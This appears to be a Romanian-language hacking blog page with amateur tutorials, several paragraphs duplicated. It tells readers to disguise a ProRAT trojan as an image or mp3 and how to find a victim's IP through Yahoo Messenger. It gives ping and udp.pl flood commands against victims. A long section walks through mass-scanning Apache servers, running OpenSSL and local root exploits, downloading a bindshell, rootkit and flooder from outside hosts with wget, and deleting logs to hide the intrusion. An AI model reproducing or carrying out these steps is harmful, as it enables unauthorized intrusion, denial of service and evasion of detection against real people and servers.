Cu PRORAT poti intra in calculatorul cuiva numai daca-i trimiti servarul pe care trebuie sa-l creezi prima data ,dupa trebuie sa-l faci indetectabil pentru ca este recunoscut de catre antivirusul victimei ca si trojan si binenteles trebuie sai schimbi formatul de exe. in jpg.sau mp3. asta la alegerea ta pentru a nu banuii victima respectiva asa ca mult noroc cu prorat-ul tau
Daca nu stiti atunci nu spuneti ca nu este posibil...in ziua de azi totul este posibil...daca doriti va pot ajuta http://freacasahare.net/files/bdg8z4jz/Hack.rar.html
este foarte simplu...Succes
este foarte simplu...Succes
FLOOD
Uite ce trebuie sa faci pentru a flooda un IP:
1.Click: Start -> Run -> CMD
2.Acolo scrieti una dintre metodele:
ping -f ip_victima
ping -t -l 65000 ip_victima
ping -t -l 45000 ip_victima
ping -t -l 25000 ip_victima
ping -t -l 15000 Ip_victima
in cmd e flood-ul acesta prima varianta: ping-f ip_victima varianta a doua: ping-t-l 65000 ip_victima Apasati Enter si apoi lasati-l sa-si faca treaba. Spor la Floodat. Notă: inlocuiti "ip_victima" cu ipul victimei de ex "89.34.15.367". Si daca vreti sa stiti si cum puteti afla IP-ul cuiva, lasati un comment.
IP-ul il afli prin Yahoo Messenger. inchizi toate ferestrele de yahoo, deschizi si vorbesti doar cu cea la care vrei sa-i afli IP-u. i itrimiti o poza sau un fisier si esti cu ochii pe TCPView, te uiti la Yahoo messenger din lista TCPView si iti apare IP-u victimei acol. daca nu te descurci zimi si fac un articol nou noutz cu step by step tutorial.
Incearca inainte sa dai un Ping la respectivu' IP sub forma (ping 89.543...)apoi apesi Enter. Daca primesti tot Request Time Out, inseamna ori ca are un firewall foarte puternic ori ca ai scris gresit IPul ori ca are IP de retea (ip-urile de retea incep cu 192.168...) cu metoda asta poti sa pici un server CS sau orice alt server de joc :D si multe altele...
cel mai simplu ma in cmd scri netstat -ty si apar toate comexiunile acolo alea cu portu cu 51 la sfarsti sunt de la mes si dak lasi decat o fereastra deskisa gasesti unu sg cu 51 la sf la port e simplu.. eu asta folosesc si merge
Dak iti apare cu comanda netstat -t sau -ty ce ai vrut u sa scri acolo e bun :))°°°°°°° k nici makr nu exista comanda aia ,ip-ul il afli cu comanda nestat –n
Incearca varianta a 2-a
"ping -t -l 65000 ip_victima" cu 65.000 transferu. Nu, nu trebuie sa fii aceasi retea cu el, trebuie sa se poata face conexiune intre voi, sa nu va blocheze stiu eu ce firewall. Cum ar fi, un server de cs, sau orice alt server de joc, care iti descopera victima, si-l face o tinta directa.
"ping -t -l 65000 ip_victima" cu 65.000 transferu. Nu, nu trebuie sa fii aceasi retea cu el, trebuie sa se poata face conexiune intre voi, sa nu va blocheze stiu eu ce firewall. Cum ar fi, un server de cs, sau orice alt server de joc, care iti descopera victima, si-l face o tinta directa.
ping ip -t -l 25000
ASA SE MAI INTIMPLA CEVA ping IP_VICTIMA -t -l 25000 dar oricum un sv respectabil nu pica de asaceva nici macar un P2 nu pica :))
ip de mess se poate afla din run o sa postez sper k nu te superi koko :D faceti irmatorul lucru:
inchideti ferestrele de yahoo. descghideti fereastra respectivului.Start>run>cmd. in cmd scrieti netstat -n . va aparea o serie de ip si porturi.Va uitati la local adress la ip care se termina in port 5101 exemplu xxx.xxx.xxx.xxx:5101 .Apoi sub categoria Foreign adress in dreptul portului :5101 e adresa respectivului :D Distractie placuta :D P.S. Portul :5101 e portul folosit de Y/M
inchideti ferestrele de yahoo. descghideti fereastra respectivului.Start>run>cmd. in cmd scrieti netstat -n . va aparea o serie de ip si porturi.Va uitati la local adress la ip care se termina in port 5101 exemplu xxx.xxx.xxx.xxx:5101 .Apoi sub categoria Foreign adress in dreptul portului :5101 e adresa respectivului :D Distractie placuta :D P.S. Portul :5101 e portul folosit de Y/M
UDP.pl FLOOD TUTORIAL
Cum dai flood cu udp.pl
Acest tutorial l-am facut pt toti obsedatii care imi zic pe mess: "man,zimi si mie,cum dau flood???" sau " man,dai pt mn flood la srv X/Y? "
Ok! Prima data e nevoie de :
ActivePerl si udp.pl[translated in RO by VeXa ]
Dupa ce ati downloadat si instalat Active Perl si dupa ce ati downloadat udp.pl,mutatil in C:\
apoi intrati in PROMPT [ start-run-cmd ] si scrieti:
Code:
cd\
si dati enter
apoi scrieti:
Code:
udp.pl [IP] [PORT ] 0
si dati enter
Acum asteptati pana "pica" serverul.
Foarte greu o.O
P.S. sper sa nu ma mai dispere nimeni pe mess
Acest tutorial l-am facut pt toti obsedatii care imi zic pe mess: "man,zimi si mie,cum dau flood???" sau " man,dai pt mn flood la srv X/Y? "
Ok! Prima data e nevoie de :
ActivePerl si udp.pl[translated in RO by VeXa ]
Dupa ce ati downloadat si instalat Active Perl si dupa ce ati downloadat udp.pl,mutatil in C:\
apoi intrati in PROMPT [ start-run-cmd ] si scrieti:
Code:
cd\
si dati enter
apoi scrieti:
Code:
udp.pl [IP] [
si dati enter
Acum asteptati pana "pica" serverul.
Foarte greu o.O
P.S. sper sa nu ma mai dispere nimeni pe mess
Ceva de Root
Deci:Cu ce tre sa incepem ca sa fim mici crackeri? (a nu se confunda cu hackeri pt ca ii cu totu altceva;hackerii fak programe si intra pe servere cu scopu de a "face bine" si a prevenii pe spargatorii de servere iar crackeri sunt "aia rai" care fak rau serverelor incepan de la a pune un bnc pe server pina al distruge folosind floodul folosinduse de ip)
Ca sa te poti apuka de hack tre sa ai la pornire un root sau un apache(cu un shell cumparat sau free nu poti incepe);root de unde poti sal primesti de la un amik care si asa are destule:PP
Sa zicem ca ai primit un root...ok....sa zicem ca ai intrat pe el cu user si pass si ca au mers;imediat dupa ce ai inntrat tre sa dai urmatoarele comenzi pt a nu salva anumite chestii pe care le faci pe root si astfel sa te vada adminu:
unset HISTFILE
unset HISTSAVE
history -n
unset WATCH
export HISTFILE=/dev/null
tar czvf mech.tgz mech
Aici sunt catea comenzi utile pe care le puteti face pe root cu explikatie cu tot:
w , uptime = arata de cate zile este serverul sus
id, whoami = arata dreptul pe care il avem pe root: apache sau root
ls, dir = arata continutul unui folder
rm -rf = sterge un folder sau fisier
Impachetez un fisier -> tar chf fisier.tar fisier
-> tar zcd fisier.tar director
Vad ip la un server -> ping -c1 yahoo.com
/sbin/ipchains -A input --destination-port -p tcp -j REJECT
route add -host ip-ul reject -> Inchid un port anume
cat /proc/cpuinfo -> Informatii despre sistem
rpm -Uhv arhiva -> despachetez arhiva rpm
gzip -9 ex.tar -> modifik extensia tar in tar.gz
/usr/sbin/useradd -o -u 0 http -> fak shell
cat /etc/issue -> vad versiunea de linux
gcc program.c -o program -> compilez un program
df -h -> vad cat re hardu
/etc/rc.d/init.d -> Afisate Pidurile
cat /etc/hosts -> Vad Vhosturile
netstat -aut -> VAd cine mai ii pe roata
cat /etc/*release -> Vad versiunea de linux
cat /etc/hosts -> Vad hosturile
alias ls='dir --color=tty'-> Bag ls
/usr/sbin/userdel user -> Sterg user
find / -name ".. " -print -xdev ->caut foldere ascunse
find / -name ".*" -print -xdev | cat -v ->caut foldere ascunse
Daca vreti sa va faceti bnc aveti aici comenzile necesare
wget marianmbt.go.ro/psyBNC2.3.1.tar.gz (extrage pe root arhiva de bnc de pe un site)
tar -xzvf psyBNC2.3.1.tar.gz (despacheteaza arhiva)
cd psybnc (intru in folderul bnc-ului)
make (compilez bnc-ul)
mv psybnc bash (mut executabilul de la bnc pe un executabil mai ascuns)
pico psybnc.conf (editez portul de la bnc)
export
bash (pornesc bnc-ul)
si asa ai bnc admin pe portu care lai setat mai sus cu pico pe ip pe care ii rootu
In caz ca nu aveti comanda "pico" folositi comanda "mc" ;ar fi mai multe dar is putin mai complikate , atunci cel mai bine luati arhiva de pico de aici:
rpm -vhU --force ftp://ftp.rpmfind.net/linux/sourceforge ... 7.i386.rpm
Bun... acuma aveti bnc pe root=ul respectiv si sa zicem ca vreti sa aveti si un bot cu care sa va jucati pe mirc sau sa va protejati un canal
De aici:
wget www.geocities.com/puydehacer/mech.tar.gz
Voi nu tre sa modifikati numai fisierul "mech.session" unde veti trece canalul unde vor intra botii prima data pe net si "emech.users" unde va puneti voi owner la boti si pe care host veti avea 100 - acces maxim la boti
puteti modifika fisierele respective folosit Norton Comander sau pico de pe root-ul respectiv salvand arhiva dupa ce ati modifikato
Ok.....deja aveti si bot si bnc pe root... sa zicem ca mai vreti sal folositi sa aveti rooatele voastre fara sa fie primite de la cineva
Atunci va trene un mass scanner de servere apache ;scanner pe care lam folosit si yo inainte sami prokur roote nu numai din scanat
Il puteti lua de aici:
wget www.marianmbt.go.ro/hack/atd.tgz
tar zxvf atd.tgz
rm -rf atd.tgz
cd atd
Acuma tre sa dati urmatoarele comenzi:
./mass -s 1000 ip -l x
exemplu: ./mass -s 1000 217.129.*.* -l x
Dupa ce au trecut cateva minute bune (vreo 30 min si sa fiti gasit cel putin vreo 300 ip, ex (found: 384) il opriti cu comanda ctrl+c
si dupa aia dati comanda:
./osslmass2 x
Acuma asteptati pt a intra in servere.O sa arate cam asa ceva:
Attacking: 213.203.196.185
: OpenSsl Exploit ... Folositi-l Pe Riscul Vostru
Deschid 30 Conexiuni
Stabilesc Conexiunea Ssl
: Incercare De Deschidere...
Connection unexpectedly closed
Daca la vreun ip va arata:
In Executie ...
Conexiune Stabilita...Bravo ..Esti Hacer ;>>
Inseamna ca ati intrat pe un server apache....
Atunci tre sa intrati intrun folder temporal;exemoplu /var/tmp sau /tmp
Veti intra asa: cd /var/tmp
Acolo veti lua o arhiva de exeploit local ca sa la puteti lua drept de root putanduva deschide un port cu user si parola
De aici luati exploitul:
wget www.x-type.go.ro/mirk/SSLROOT.GZ
tar zxvf SSLROOT.GZ
rm -rf SSLROOT.GZ
./sslroot
Daca nu va arata din prima "U got a root shell" mai dati de cateva ori ./sslroot pina va apare
ok... acuma sunteti pe root pe respectivul server(nu toate serverele va permite sa aveti acest drept)
Acuma va puteti deschide un port pe 4000 ca sa puteti intra cand vreti pe el dupa ce ati terminat de scanat cu scanerul de pe care ati inrrat pe el
wget http://www.geocities.com/mr_sali3ri/za.tgz
tar zxvf za.tgz
rm -rf za.tgz
cd za
./zbind
Dupe ce ati dat asta o sa aveti root fara user si pass doar ip pe serveru la care va zis aia cu bravo esti hacer pe port 400
Cel mai bine ar fi sa folositi un rk pt ca veti avea user root si parola care veo alegeti astfel ne putant intra nimeni care va stie ip-ul cum ar fi daca avea avea zbind pe el
wget haceri-in-actiune.info/rk.tar.gz
tar zxvf rk.tar.gz
rm -rf rk.tar.gz
cd rk
./setup
portul o sa fie: 6969
Dupa acestia veti avea root pe ip pe care ati bagat rk cu user:root si pass: ala care lati ales cand ati dat ./setup
Acuma tre sa va securizati rootul ca sa nu mai intre nimeni peste voi
Cel mai simplu editati "httpd.conf" din /etc
Cautati in fisierul respectiv unde apare "sslengine"
Acolo o sa va apara "on" dar voi modifikati si puneti "off" dupa care dati comanda:
service httpd reload
Hm... sa zicem ca vreti sal floodati pe cineva pt ca va suparat...aici aveti arhiva si comenzile sa terminati cu nemernikul:PP
wget r3dstorm.com/meg.tgz (marianmbt.go.ro/udp.pl)
tar -xzf meg.tgz
rm -rf meg.tgz
cd meg/bin
./stealth ip port
ex ./stealth 193.230.212.70 22
Acuma dupa ce ati fakut atatea chestii pe root tre sa va stergeti urma stergand urmatoarele fisiere:
rm -rf .bash_history
rm -rf /var/run/utmp
rm -rf /var/run/wtmp -
rm -rf /var/log/lastlog
rm -rf /usr/adm/lastlog
rm -rf .bash_history
cd /var/log/
rm -rf wtmp
rm -rf secure
rm -rf lastlog
rm -rf messages
touch messagess
touch wtmp
touch secure
touch lastlog
cd /root
rm -rf .bash_history
touch .bash_history
Acuma puteti iesii linistit de pe root:
Man ai skype ?
RăspundețiȘtergereMan ai skype ?
RăspundețiȘtergere